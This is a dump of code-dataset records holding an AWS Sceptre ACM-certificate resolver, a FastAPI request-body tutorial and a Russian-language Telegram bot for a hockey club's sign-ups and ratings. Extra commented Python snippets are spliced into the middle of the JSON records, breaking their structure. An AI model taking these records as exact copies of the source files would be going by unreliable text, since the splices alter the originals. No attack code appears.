sceptre.exceptions import InvalidHookArgumentSyntaxError\nfrom uc3_sceptre_utils.util import acm\n\nDEFAULT_REGION = 'us-east-1'\n\n\nclass AcmCertificateArn(Resolver):\n \"\"\"\n Returns a AWS ACM certificate ARN given a domain name and a\n AWS region. 
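# --- Sketch of the argument convention in the AcmCertificateArn docstring
# above (implemented by resolve() just below): one token is "fqdn only" with
# the region defaulting to us-east-1, two tokens are "fqdn region".
DEFAULT_REGION = 'us-east-1'

def parse_resolver_argument(argument):
    parts = argument.split()
    if len(parts) == 2:
        return parts[0], parts[1]
    if len(parts) == 1:
        return parts[0], DEFAULT_REGION
    raise ValueError('expected: cert_fqdn [region]')

assert parse_resolver_argument('ashley-demo.example.com us-west-2') == ('ashley-demo.example.com', 'us-west-2')
assert parse_resolver_argument('ashley-demo.example.com') == ('ashley-demo.example.com', 'us-east-1')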
The region can be omitted in which case it defaults\n to 'us-east-1'.\n\n Example sceptre config usage:\n\n CertARN: !acm_certificate_arn ashley-demo.example.com us-west-2\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(AcmCertificateArn, self).__init__(*args, **kwargs)\n\n def resolve(self):\n if len(self.argument.split()) == 2:\n cert_fqdn, region = self.argument.split()\n elif len(self.argument.split()) == 1:\n cert_fqdn = self.argument\n region = DEFAULT_REGION\n else:\n raise InvalidHookArgumentSyntaxError(\n '{}: resolver requires either one or two positional parameters: '\n 'cert_fqdn [region]'.format(__name__)\n )\n\n arn = acm.get_cert_arn(cert_fqdn, region)\n if not arn:\n arn = str()\n self.logger.debug('{} - certificate_arn: {}'.format(__name__, arn))\n return arn\n","repo_name":"CDLUC3/uc3-sceptre-utils","sub_path":"uc3_sceptre_utils/resolvers/acm_certificate_arn.py","file_name":"acm_certificate_arn.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"28291139625","text":"'''\nA request body is data sent by the client to your API. A response body is the data your API sends to the client. \nYour API almost always has to send a response body. But clients don’t necessarily need to send request bodies all \nthe time.\n'''\n# Request body using pydantic\n\nfrom typing import Optional\n\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n name: str\n description: Optional[str] = None\n price: float\n tax: Optional[float] = None\n\n# description and tax are optional because they have a default value of None. A json object without these two fields are also valid.\n\napp = FastAPI()\n\n# Adding the new pydantic model to the path operation as a parameter\n\n@app.post(\"/items/\")\nasync def create_item(item: Item):\n return item\n\n\n# Receiving what is in function instead of dict\n@app.post(\"/itemsupdt/\")\nasync def create_item(item: Item):\n item_dict = item.model_dump()\n if item.tax:\n price_with_tax = item.price + item.tax\n item_dict.update({\"price_with_tax\": price_with_tax})\n return item_dict\n\n# Declare path parameters and a request body at the same time\n@app.put(\"/items/{item_id}\")\nasync def create_item(item_id: int, item: Item):\n return {\"item_id\": item_id, **item.model_dump()}\n","repo_name":"priyankarnd/All-Python","sub_path":"FastAPI/request_body.py","file_name":"request_body.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"73605052883","text":"import re\nfrom datetime import datetime, timedelta\nfrom typing import List\n\nfrom aiogram import types\nfrom aiogram.dispatcher import FSMContext\n\nfrom bot import django_crud as dj\nfrom bot.config import ADM_ID, DEV_ID\nfrom bot.dialogue_utils import (send_dialogue_message,\n send_dialogue_message_with_media)\nfrom bot.loader import dp, bot\nfrom bot.states import Adm_State, Dialogue_State, StartState, CahngeProfileState\nfrom bot.utils import user_notification, game_notification\n\n\nasync def main_menu_message(msg):\n message = '''Доброе пожаловать в ХК \"Катюша\"!\n\nЕсли Вы уже посещали наши тренировки, выберите - \"Войти\".\nВ ином случае выберите - \"Регистрация\"\n'''\n sign_in_button = types.InlineKeyboardButton('Войти', callback_data='sign_in_button')\n sign_up_button = types.InlineKeyboardButton('Регистрация', callback_data='sign_up_button')\n keyboard = 
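# --- A request body that validates against the Item model above: description
# and tax may be omitted since they default to None. Posting it to
# POST /itemsupdt/ returns the dict extended with price_with_tax. The host
# and port below are assumptions for a local uvicorn run.
import json
import urllib.request

payload = {"name": "hammer", "price": 9.99, "tax": 1.25}
req = urllib.request.Request(
    "http://127.0.0.1:8000/itemsupdt/",
    data=json.dumps(payload).encode(),
    headers={"Content-Type": "application/json"},
    method="POST",
)
# urllib.request.urlopen(req)   # uncomment with the FastAPI app running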
types.InlineKeyboardMarkup().row(sign_in_button, sign_up_button)\n await msg.answer(message, reply_markup=keyboard)\n\n#приветстви только новых пользователей бота\n@dp.message_handler(commands=['start'])\nasync def start(msg: types.Message):\n if msg.from_user.id == ADM_ID or msg.from_user.id == DEV_ID:\n button_1 = types.KeyboardButton('Запись на тренировку 🏒')\n button_2 = types.KeyboardButton('Оценки тренировок 📊')\n button_3 = types.KeyboardButton('Рупор 📢')\n button_4 = types.KeyboardButton('Запись на игру 🎮')\n keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\n keyboard.row(button_4, button_1)\n keyboard.row(button_3, button_2)\n await msg.answer('Добро пожаловать! Админ-мод включен.', reply_markup=keyboard)\n else:\n tg_id = await dj.check_new_user(msg.from_user.id)\n if not tg_id:\n await main_menu_message(msg)\n\n@dp.message_handler(commands=['schedule'])\nasync def show_shedule(msg: types.Message):\n trainings_data = await dj.get_shedule()\n message = '''\nТренировки на эту неделю:\n\n\n'''\n day_order = {'Понедельник': 1, 'Вторник': 2, 'Среда': 3, 'Четверг': 4, \n 'Пятница': 5, 'Суббота': 6, 'Воскресенье': 7}\n sorted_trainings_data = sorted(trainings_data, key=lambda x: day_order.get(x['day'], float('inf')))\n for data in sorted_trainings_data:\n day = data.get('day')\n time = data.get('time')\n place = data.get('place')\n address = data.get('address')\n message += f'{day} {time} - {place} | {address}\\n\\n'\n \n await msg.answer(message)\n\n#диалог с тренером\n@dp.message_handler(commands=['dialogue'])\nasync def start_dialogue(msg: types.Message):\n if msg.from_user.id == ADM_ID:\n await msg.answer('Эта функция доступна только игрокам.')\n return\n message = '''\nРежим диалога включён.\nВсё, что Вы напишите, будет ��тправлено тренеру ХК \"Катюша\".\nЧтобы выйти из диалога воспользуйтесь командой /stop_dialogue.\n'''\n await msg.answer(message)\n await Dialogue_State.start.set()\n\n@dp.message_handler(commands=['stop_dialogue'], state=Dialogue_State.start)\nasync def cancel_dialogue(msg: types.Message, state: FSMContext):\n if msg.from_user.id == ADM_ID:\n await msg.answer('Эта функция доступна только игрокам.')\n return\n await msg.answer('Режим диалога выключен.')\n await state.finish()\n\n@dp.message_handler(commands=['training_today'])\nasync def get_training_info(msg: types.Message):\n user_data = await dj.check_new_user(msg.from_user.id)\n if not user_data:\n await msg.answer('Войдите в профиль или зарегистрируйтесь')\n return\n if msg.from_user.id == ADM_ID:\n await msg.answer('Эта команда для игроков')\n return\n trainings_data = await dj.get_training_info()\n if not trainings_data:\n await msg.answer('Тренировок для записи нет.')\n return\n if trainings_data == 'not today':\n await msg.answer('На сегодня тренировок нет')\n return\n if len(trainings_data) == 1:\n await user_notification({'id': msg.from_user.id, 'first_not': True} ,trainings_data[0], 'today')\n else:\n message = 'Выберите тренировку\\n\\n'\n count = 1\n keyboard = types.InlineKeyboardMarkup()\n for training in trainings_data:\n id = training.get('id')\n time = training.get('time').strftime('%H:%M')\n address = training.get('address')\n place = training.get('place')\n if training.get('day') == 'friday':\n training_type = '( *игровая тренировка* )'\n else:\n training_type = '( *тренировка* )'\n button = types.InlineKeyboardButton(f'{count}) {time}', callback_data=f'select_training_{id}')\n keyboard.add(button)\n message += f'''{count})\n🕖Лёд в {time}{training_type} \n🏟Стадион: {place} 
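# --- The schedule handler above orders rows by weekday name through a rank
# dict; unknown day strings sink to the end via float('inf'). Distilled:
day_order = {'Понедельник': 1, 'Вторник': 2, 'Среда': 3, 'Четверг': 4,
             'Пятница': 5, 'Суббота': 6, 'Воскресенье': 7}
rows = [{'day': 'Среда'}, {'day': '???'}, {'day': 'Понедельник'}]
ordered = sorted(rows, key=lambda x: day_order.get(x['day'], float('inf')))
assert [r['day'] for r in ordered] == ['Понедельник', 'Среда', '???']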
\n{address}\n\n'''\n count += 1\n await msg.answer(message, reply_markup=keyboard)\n\n@dp.callback_query_handler(lambda call: call.data.startswith('select_training_'))\nasync def show_selected_training(call: types.CallbackQuery):\n await call.message.delete()\n training_id = call.data.split('_')[2]\n trainings_data = await dj.get_training_info(id=training_id)\n if not trainings_data or trainings_data == 'not today':\n await call.message.answer('Кажется, запись на тренировку завершена.')\n return\n await user_notification({'id': call.from_user.id, 'first_not': True} , trainings_data[0], 'today')\n\nasync def get_user_profile(msg):\n user_data = await dj.check_new_user(msg.from_user.id)\n if not user_data:\n await msg.answer('Войдите в профиль или зарегистрируйтесь')\n return\n name = user_data.name\n phone = user_data.tel_number\n birthday = user_data.birthday.strftime('%d.%m.%Y')\n message = f'''\nФИО: {name}\nНомер телефона: {phone}\nДень рождения: {birthday}\n\nЧто желаете изменить?\n'''\n change_name_button = types.InlineKeyboardButton('ФИО', callback_data='change_button_name')\n change_phone_button = types.InlineKeyboardButton('Номер телефона', callback_data='change_button_phone')\n change_birthday_button = types.InlineKeyboardButton('День рождения', callback_data='change_button_birthday')\n keyboard = types.InlineKeyboardMarkup().row(change_name_button, change_phone_button).add(change_birthday_button)\n await msg.answer(message, reply_markup=keyboard)\n\n@dp.message_handler(commands=['games'])\nasync def game_info(msg: types.Message):\n user_data = await dj.check_new_user(msg.from_user.id)\n if not user_data:\n await msg.answer('Войдите в профиль или зарегистрируйтесь')\n return\n if msg.from_user.id == ADM_ID:\n await msg.answer('Эта команда для игроков')\n return\n games_data = await dj.check_games(msg.from_user.id)\n if not games_data:\n await msg.answer('На данный момент нет игр для записи.')\n return\n message = 'Выберите игру:\\n\\n'\n count = 1\n keyboard = types.InlineKeyboardMarkup()\n for game in games_data:\n data_time = game.date_time.strftime('%d.%m.%Y %H:%M')\n game_info = f'{count}) {game.place} {game.address} {data_time}\\n'\n message += game_info\n button = types.InlineKeyboardButton(f'{count}) {game.place}', callback_data=f'select_game_{game.id}')\n keyboard.add(button)\n count += 1\n await msg.answer(message, reply_markup=keyboard)\n\n@dp.callback_query_handler(lambda call: call.data.startswith('select_game'))\nasync def select_game(call: types.CallbackQuery):\n await call.message.delete()\n game_id = call.data.split('_')[2]\n game_data = await dj.get_game_data(game_id, call.from_user.id)\n if not game_data:\n await call.message.answer('Кажется, запись на игру завершена.')\n return\n await game_notification(game_data.get('user'), game_data.get('game'), was_call=True)\n\n\n@dp.message_handler(commands=['my_profile'])\nasync def get_training_info(msg: types.Message):\n if msg.from_user.id == ADM_ID:\n await msg.answer('Эта команда для игроков')\n return\n await get_user_profile(msg)\n\n@dp.callback_query_handler(lambda call: call.data.startswith('change_button'))\nasync def change_data(call: types.CallbackQuery):\n await call.message.delete()\n data_for_change = call.data.split('_')[2]\n if data_for_change == 'name':\n await call.message.answer('Напишите ФИО')\n await CahngeProfileState.name.set()\n if data_for_change == 'phone':\n await call.message.answer('Напишите номер телефона в формате: 89000000000(числа подряд)')\n await CahngeProfileState.phone_number.set()\n 
if data_for_change == 'birthday':\n await call.message.answer('Напишите день рождения в формате: 01.01.1970')\n await CahngeProfileState.birthday.set()\n \n\n@dp.message_handler(state=CahngeProfileState.name)\nasync def change_name(msg: types.Message, state: FSMContext):\n await dj.change_name(msg.from_user.id, msg.text)\n await msg.answer('Имя изменено')\n await get_user_profile(msg)\n await state.finish()\n\n@dp.message_handler(state=CahngeProfileState.phone_number)\nasync def change_phone(msg: types.Message, state: FSMContext):\n if msg.text.isdigit() and len(msg.text) == 11:\n await dj.change_phone(msg.from_user.id, msg.text)\n await msg.answer('Номер телефона изменен')\n await get_user_profile(msg)\n await state.finish()\n else:\n await msg.answer('Неверный формат. Повторите ввод.')\n\n@dp.message_handler(state=CahngeProfileState.birthday)\nasync def change_birthday(msg: types.Message, state: FSMContext):\n regex = r\"\\d{2}\\.\\d{2}\\.\\d{4}\"\n if not re.search(regex, msg.text):\n await msg.answer('Неверный формат даты. Повторите ввод.', reply_markup=cancel_reg_keyboard())\n return\n date_object = datetime.strptime(msg.text, \"%d.%m.%Y\")\n birthday = date_object.strftime(\"%Y-%m-%d\")\n await dj.change_birthday(msg.from_user.id, birthday)\n await msg.answer('Дата рождения изменена')\n await get_user_profile(msg)\n await state.finish()\n\n\n@dp.message_handler(is_media_group=False,\n content_types=['text', 'audio', 'document', 'sticker', 'photo', \n 'video', 'voice', 'contact', 'location'],\n state=Dialogue_State.start)\nasync def dialog_handler(msg: types.Message):\n await send_dialogue_message(msg)\n\n\n@dp.message_handler(is_media_group=True, content_types=['audio', 'document', 'photo', 'video'],\n state=Dialogue_State.start)\nasync def dialog_handler_media(msg: types.Message, album: List[types.Message]):\n await send_dialogue_message_with_media(msg,album)\n\n#для разбивки крупного сообщения\ndef split_message(message, max_length=4096):\n \"\"\"Разбивает сообщение на части, не превышающие max_length символов.\"\"\"\n return [message[i:i+max_length] for i in range(0, len(message), max_length)]\n\nasync def show_users_training(msg, training_id):\n data = await dj.get_accept_users(training_id)\n if not data:\n await msg.answer('Ещё никто не записался')\n return\n training_data = data.get('training_data')\n place = training_data.get('place')\n address = training_data.get('address')\n time = training_data.get('time').strftime('%H:%M')\n message1 = f'''{place}\n{address}\n{time}\n\nУже записались:\n \n'''\n message2 = '''\n\nПередумали и отказались:\n\n'''\n counter1 = 0\n counter2 = 0\n for user in data.get('users_data'):\n name = user.get('name')\n birthday = user.get('birthday')\n newbie = user.get('newbie')\n if user.get('changed'):\n counter2 += 1\n message2 += f'❌ {counter2}) {name} {birthday} {newbie}\\n'\n else:\n counter1 += 1\n message1 += f'✅ {counter1}) {name} {birthday} {newbie}\\n'\n\n\n message = message1 + message2\n try:\n await msg.answer(message)\n except Exception as e:\n if str(e) == 'Message is too long':\n parts = split_message(message, max_length=4096)\n for part in parts:\n await msg.answer(part)\n\nasync def show_users_game(users_data, msg):\n if not users_data:\n await msg.answer('Ещё никто не записался')\n return\n team = users_data[0].get('team')\n game = users_data[0].get('game')\n game_date_time = game.date_time.strftime('%d.%m.%Y %H:%M')\n message1 = f'''Команда: {team}\nИгра: {game.place} {game.address} {game_date_time}\nУже записались:\n \n'''\n 
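# --- The phone checks above accept "all digits, exactly 11 of them". Note
# that str.isdigit() is Unicode-aware (e.g. '²' counts as a digit), so a
# stricter ASCII-only variant, offered here as a suggestion, is:
import re

def is_valid_phone(text):
    return bool(re.fullmatch(r'[0-9]{11}', text))

assert is_valid_phone('89000000000')
assert not is_valid_phone('8900000000')     # ten digits
assert not is_valid_phone('8900000000²')    # passes isdigit(), fails here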
message2 = '''\n\nПередумали и отказались:\n\n'''\n counter1 = 0\n counter2 = 0\n for user in users_data:\n name = user.get('name')\n user_birthday = user.get('birthday').strftime(\"%d.%m\")\n now = datetime.now()\n then = now + timedelta(days = 1)\n birthday = ''\n if user_birthday == now.strftime(\"%d.%m\"):\n birthday = '(Сегодня день рождения🥳)'\n if user_birthday == then.strftime(\"%d.%m\"):\n birthday = '(Завтра день рождения🥳)'\n if user.get('newbie'):\n newbie = 'Новичок'\n else:\n newbie = ''\n if user.get('changed'):\n counter2 += 1\n message2 += f'❌ {counter2}) {name} {birthday} {newbie}\\n'\n else:\n counter1 += 1\n message1 += f'✅ {counter1}) {name} {birthday} {newbie}\\n'\n\n\n message = message1 + message2\n try:\n await msg.answer(message)\n except Exception as e:\n if str(e) == 'Message is too long':\n parts = split_message(message, max_length=4096)\n for part in parts:\n await msg.answer(part)\n\n@dp.message_handler(is_media_group=False,\n content_types=['text', 'audio', 'document', 'sticker', 'photo', \n 'video', 'voice', 'contact', 'location'])\nasync def dialog_handler(msg: types.Message):\n if msg.from_user.id == ADM_ID or msg.from_user.id == DEV_ID:\n if msg.text == 'Оценки тренировок 📊':\n message = '''\nЗа какой день хотите посмотреть тренировку?\n'''\n select_date_button = types.InlineKeyboardButton('Указать дату', callback_data='select_date_button')\n yesterday_training_button = types.InlineKeyboardButton('За вчерашний', callback_data='yesterday_training_button')\n keyboard = types.InlineKeyboardMarkup().row(select_date_button, yesterday_training_button)\n await msg.answer(message, reply_markup=keyboard)\n elif msg.text == 'Запись на тренировку 🏒':\n trainings_data = await dj.get_training_info()\n if not trainings_data:\n await msg.answer('Тренеровок пока нет')\n return\n elif trainings_data == 'not today':\n await msg.answer('На сегодня тренировок нет или ещё никто не записался.')\n return\n if len(trainings_data) == 1:\n await show_users_training(msg, trainings_data[0].get('id'))\n return\n message = 'Выберите тренировку\\n\\n'\n count = 1\n keyboard = types.InlineKeyboardMarkup()\n for training in trainings_data:\n id = training.get('id')\n time = training.get('time').strftime('%H:%M')\n address = training.get('address')\n place = training.get('place')\n if training.get('day') == 'friday':\n training_type = '( *игровая тренировка* )'\n else:\n training_type = '( *тренировка* )'\n button = types.InlineKeyboardButton(f'{count}) {time}', callback_data=f'select_current_training_{id}')\n keyboard.add(button)\n message += f'''{count})\n🕖Лёд в {time}{training_type} \n🏟Стадион: {place} \n{address}\n\n'''\n count += 1\n await msg.answer(message, reply_markup=keyboard)\n elif msg.text == 'Запись на игру 🎮':\n games_data = await dj.check_games_admin()\n if not games_data:\n await msg.answer('Игры ещё не объявлены')\n return\n \n message = 'Выберите игру\\n\\n'\n count = 1\n keyboard = types.InlineKeyboardMarkup()\n for game in games_data:\n date_time = game.get('date_time')\n place = game.get('place')\n team = game.get('team')\n id = game.get('id')\n data_time = date_time.strftime('%d.%m.%Y %H:%M')\n message += f'{count}) {place} {team} {data_time}\\n'\n button = types.InlineKeyboardButton(f'{count}) {place}', callback_data=f'admin_select_game_{id}')\n keyboard.add(button)\n count += 1\n await msg.answer(message, reply_markup=keyboard)\n elif msg.text == 'Рупор 📢':\n await msg.answer('Напишите сообщения для всех игроков. 
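# --- split_message() above chops an over-long text into chunks of at most
# 4096 characters (Telegram's per-message limit), which the show_users_*
# views use in the "Message is too long" fallback. Quick check of the
# slicing arithmetic:
def _split(message, max_length=4096):
    return [message[i:i + max_length] for i in range(0, len(message), max_length)]

assert _split('abcdefgh', max_length=3) == ['abc', 'def', 'gh']
assert ''.join(_split('abcdefgh', max_length=3)) == 'abcdefgh'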
(Сообщение может содержать текст и одну картинку)')\n await Adm_State.megaphone.set()\n else:\n await send_dialogue_message(msg)\n\n@dp.callback_query_handler(lambda call: call.data.startswith('select_current_training_'))\nasync def show_selected_training(call: types.CallbackQuery):\n await call.message.delete()\n training_id = call.data.split('_')[3]\n await show_users_training(call.message, training_id)\n\n@dp.callback_query_handler(lambda call: call.data.startswith('admin_select_game'))\nasync def select_game_admin(call: types.CallbackQuery):\n await call.message.delete()\n game_id = call.data.split('_')[3]\n users_data = await dj.get_game_users_admin(game_id)\n await show_users_game(users_data, call.message)\n\n\n@dp.message_handler(state=Adm_State.megaphone, content_types=['text', 'photo'])\nasync def save_message_to_state(msg: types.Message, state: FSMContext):\n if msg.content_type == 'text':\n await state.update_data(text=msg.text, photo=None)\n if msg.content_type == 'photo':\n await state.update_data(text=msg.caption, photo=msg.photo[-1].file_id)\n cancel_megaphone_button = types.InlineKeyboardButton('Отмена', callback_data='cancel_megaphone_button')\n send_megaphone_button = types.InlineKeyboardButton('Отправить', callback_data='send_megaphone_button')\n keyboard = types.InlineKeyboardMarkup().row(cancel_megaphone_button, send_megaphone_button)\n await msg.answer('''\nОтправить?\n\nВнимание. Можно отправить только одно сообщение - последнее из написаных.\nЕсли Вы хотите отправить другое, то просто напишите новое сообщение.\n''', reply_markup=keyboard)\n\n@dp.callback_query_handler(lambda call: call.data == 'cancel_megaphone_button', state=Adm_State.megaphone)\nasync def cancel_megaphone(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n await call.message.answer('Отправка отменена.')\n await state.finish()\n\n@dp.callback_query_handler(lambda call: call.data == 'send_megaphone_button', state=Adm_State.megaphone)\nasync def send_megaphone(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n users_ids = await dj.get_users_ids()\n state_data = await state.get_data()\n state_text = state_data.get('text')\n state_photo = state_data.get('photo')\n for_del = await call.message.answer('📩 Рассылаю...')\n for id in users_ids:\n try:\n if state_photo:\n await bot.send_photo(chat_id=id, photo=state_photo, caption=state_text)\n else:\n await bot.send_message(chat_id=id, text=state_text)\n except Exception as e:\n print(e)\n await bot.delete_message(chat_id=call.message.chat.id, message_id=for_del.message_id)\n await call.message.answer('Сообщение отправлено.')\n await state.finish()\n\n@dp.message_handler(is_media_group=True, content_types=['audio', 'document', 'photo', 'video'])\nasync def dialog_handler_media(msg: types.Message, album: List[types.Message]):\n if msg.from_user.id == ADM_ID:\n await send_dialogue_message_with_media(msg,album)\n\nasync def show_rates_for_training(rates_data, training_data, msg):\n date = training_data.get('date')\n time = training_data.get('time')\n place = training_data.get('place')\n address = training_data.get('address')\n date_time = datetime.combine(date, time)\n date_time = date_time.strftime('%d.%m.%Y %H:%M')\n message = f'''Оценки за вчершанюю тренировку:\n{date_time} \n{place}\n{address}\n\n\n'''\n for user in rates_data.get('users'):\n name = user.get('name')\n rate = user.get('rate')\n message += f'{name} - {rate}\\n'\n average_score = rates_data.get('average_score')\n message += f'\\nСредняя 
оценка тренировки - {average_score}'\n await msg.answer(message)\n\n#показать оценки за вчершании тренирровки\n@dp.callback_query_handler(lambda call: call.data == 'yesterday_training_button')\nasync def get_yesterday_rates(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n rated_trainings = await dj.get_rated_trainings()\n if not rated_trainings:\n await call.message.answer('Вчера тренировок не было.')\n return\n if len(rated_trainings) == 1:\n rates_data = await dj.get_training_rates(rated_trainings[0])\n await show_rates_for_training(rates_data, rated_trainings[0], call.message)\n else:\n message = 'Выберите тренировку\\n\\n'\n count = 1\n keyboard = types.InlineKeyboardMarkup()\n for training in rated_trainings:\n date = training.get('date')\n time = training.get('time')\n place = training.get('place')\n address = training.get('address')\n id = training.get('id')\n date_time = datetime.combine(date, time)\n date_time = date_time.strftime('%d.%m.%Y %H:%M')\n message += f'''{count})\n{date_time} \n{place}\n{address}\\n\\n'''\n button = types.InlineKeyboardButton(f'{count}) {place}', callback_data=f'select_rated_training_{id}')\n keyboard.add(button)\n count += 1\n await call.message.answer(message, reply_markup=keyboard)\n await state.update_data(trainings=rated_trainings)\n\n\n@dp.callback_query_handler(lambda call: call.data.startswith('select_rated_training_'))\nasync def show_selected_training(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n training_id = call.data.split('_')[3]\n state_data = await state.get_data()\n trainings = state_data.get('trainings')\n for training in trainings:\n if training.get('id') == int(training_id):\n rates_data = await dj.get_training_rates(training)\n await show_rates_for_training(rates_data, training, call.message)\n await state.finish()\n break\n\n#показать оценки за тренировку по выбранной дате\n@dp.callback_query_handler(lambda call: call.data == 'select_date_button')\nasync def get_rates_by_date(call: types.CallbackQuery):\n await call.message.delete()\n cancel_training_date_button = types.InlineKeyboardButton('Отмена', callback_data='cancel_training_date_button')\n keyboard = types.InlineKeyboardMarkup().add(cancel_training_date_button)\n await call.message.answer('Напишите дату тренировки в формате: 01.01.1970',\n reply_markup=keyboard)\n await Adm_State.training_date.set()\n\n@dp.callback_query_handler(lambda call: call.data == 'cancel_training_date_button',\n state=Adm_State.training_date)\nasync def cancel_training_date(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n await call.message.answer('Действие отменено.')\n await state.finish()\n\n\n@dp.message_handler(state=Adm_State.training_date)\nasync def get_rates_by_date(msg: types.Message, state: FSMContext):\n regex = r\"\\d{2}\\.\\d{2}\\.\\d{4}\"\n if not re.search(regex, msg.text):\n cancel_training_date_button = types.InlineKeyboardButton('Отмена', callback_data='cancel_training_date_button')\n keyboard = types.InlineKeyboardMarkup().add(cancel_training_date_button)\n await msg.answer('Неверный формат даты. 
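# --- The rating views above merge a date column and a time column with
# datetime.combine before formatting. Minimal check of that step:
from datetime import datetime, date, time

date_time = datetime.combine(date(2024, 1, 15), time(19, 30))
assert date_time.strftime('%d.%m.%Y %H:%M') == '15.01.2024 19:30'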
Повторите ввод.', reply_markup=keyboard)\n        return\n    training_date = datetime.strptime(msg.text, \"%d.%m.%Y\")\n    rated_trainings = await dj.get_rated_trainings(training_date)\n    if not rated_trainings:\n        await msg.answer('В этот день тренировок не было.')\n        await state.finish()\n        return\n    if len(rated_trainings) == 1:\n        rates_data = await dj.get_training_rates(rated_trainings[0])\n        await show_rates_for_training(rates_data, rated_trainings[0], msg)\n    else:\n        message = 'Выберите тренировку\\n\\n'\n        count = 1\n        keyboard = types.InlineKeyboardMarkup()\n        for training in rated_trainings:\n            date = training.get('date')\n            time = training.get('time')\n            place = training.get('place')\n            address = training.get('address')\n            id = training.get('id')\n            date_time = datetime.combine(date, time)\n            date_time = date_time.strftime('%d.%m.%Y %H:%M')\n            message += f'''{count})\n{date_time} \n{place}\n{address}\\n\\n'''\n            button = types.InlineKeyboardButton(f'{count}) {place}', callback_data=f'select_rated_training_{id}')\n            keyboard.add(button)\n            count += 1\n        await msg.answer(message, reply_markup=keyboard)\n    await state.finish()\n    await state.update_data(trainings=rated_trainings)\n\n\n#вход для существующих пользователей\n@dp.callback_query_handler(lambda call: call.data == 'sign_in_button')\nasync def sign_in(call: types.CallbackQuery):\n    await call.message.delete()\n    message = '''\nПожалуйста укажите Ваш номер телефона для идентификации.\nВ формате: 89000000000(числа подряд)'''\n    await call.message.answer(message)\n    await StartState.phone_number_sign_in.set()\n\n#идентификация существующих пользователей по номеру телефона\n@dp.message_handler(state=StartState.phone_number_sign_in)\nasync def get_tel_number(msg: types.Message, state: FSMContext):\n    if msg.text.isdigit() and len(msg.text) == 11:\n        user_name = await dj.identification_by_tel_number(msg.from_user.id, msg.text)\n        if not user_name:\n            main_menu_button = types.InlineKeyboardButton('В главное меню', callback_data='main_menu_button')\n            keyboard = types.InlineKeyboardMarkup().add(main_menu_button)\n            await msg.answer('''🚫 Извините, пользователя с этим номером телефона нет в базе данных.\nВозможно Вы записаны под другим номером телефона.\n\nВы можете:\n- Обратиться к тренеру (команда /dialogue).\n- Повторить ввод\n- Вернуться в главное меню и выполнить регистрацию''', reply_markup=keyboard)\n            \n            return\n        await msg.answer(f'{user_name}, рады Вас приветствовать. Совсем скоро я уведомлю Вас о предстоящей тренировке!')\n        await state.finish()\n        return\n    await msg.answer('Вы неверно ввели номер телефона. Должно быть 11 цифр. Пожалуйста повторите попытку.')\n    return\n\n#возврат в главное меню при неудачной попытке войти\n@dp.callback_query_handler(lambda call: call.data == 'main_menu_button', state=StartState.phone_number_sign_in)\nasync def back_to_start(call: types.CallbackQuery, state: FSMContext):\n    await call.message.delete()\n    await main_menu_message(call.message)\n    await state.finish()\n\n#клавиатура отмены регистрации\ndef cancel_reg_keyboard():\n    cancel_reg_button = types.InlineKeyboardButton('Отмена', callback_data='cancel_reg_button')\n    keyboard = types.InlineKeyboardMarkup().add(cancel_reg_button)\n    return keyboard\n\n#регистрация новых пользователей\n@dp.callback_query_handler(lambda call: call.data == 'sign_up_button')\nasync def sign_up(call: types.CallbackQuery):\n    await call.message.delete()\n    message = '''\nДавайте знакомиться. 
Напишите пожалуйста Ваши ФИО.'''\n\n await call.message.answer(message, reply_markup=cancel_reg_keyboard())\n await StartState.name.set()\n\n#отмена при записи имени\n@dp.callback_query_handler(lambda call: call.data == 'cancel_reg_button', state=StartState.name)\nasync def cancel_name(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n await state.finish()\n await main_menu_message(call.message)\n\n#запись имени в State\n@dp.message_handler(state=StartState.name)\nasync def get_name(msg: types.Message, state: FSMContext):\n await state.update_data(name=msg.text)\n await msg.answer('''Принято. Теперь укажите Ваш номер телефона.\nВ формате: 89000000000(числа подряд)''', \n reply_markup=cancel_reg_keyboard())\n await StartState.phone_number_sign_up.set()\n\n#отмена при записи номера телефона\n@dp.callback_query_handler(lambda call: call.data == 'cancel_reg_button', state=StartState.phone_number_sign_up)\nasync def cancel_name(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n await state.finish()\n await main_menu_message(call.message)\n\n#запись номера телефона в State\n@dp.message_handler(state=StartState.phone_number_sign_up)\nasync def get_tel_number(msg: types.Message, state: FSMContext):\n if msg.text.isdigit() and len(msg.text) == 11:\n await state.update_data(phone_number_sign_up=msg.text)\n await msg.answer('''И последний вопрос. Когда у Вас день рождения?\nУкажите в формате: 01.01.1970''', reply_markup=cancel_reg_keyboard())\n await StartState.birthday.set()\n else:\n await msg.answer('Вы неверно ввели номер телефона. Должно быть 11 цифр. Пожалуйста повторите попытку.',\n reply_markup=cancel_reg_keyboard())\n\n#отмена при записи дня рождения\n@dp.callback_query_handler(state=StartState.birthday)\nasync def cancel_birthday(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n await state.finish()\n await main_menu_message(call.message)\n\n#получение дня рождения и запись всех полученных данных в бд с галочкой \"новичок\"\n@dp.message_handler(state=StartState.birthday)\nasync def get_birthday(msg: types.Message, state: FSMContext):\n regex = r\"\\d{2}\\.\\d{2}\\.\\d{4}\"\n if not re.search(regex, msg.text):\n await msg.answer('Неверный формат даты. Повторите ввод.', reply_markup=cancel_reg_keyboard())\n return\n state_data = await state.get_data()\n name = state_data.get('name')\n phone_number = state_data.get('phone_number_sign_up')\n date_object = datetime.strptime(msg.text, \"%d.%m.%Y\")\n birthday = date_object.strftime(\"%Y-%m-%d\")\n user_id = msg.from_user.id\n await dj.add_new_user(name, phone_number, birthday, user_id)\n await msg.answer(f'''\nФИО: {name}\nНомер телефона: {phone_number}\nДень рождения: {msg.text}\n\nРегистрация прошла успешно. 
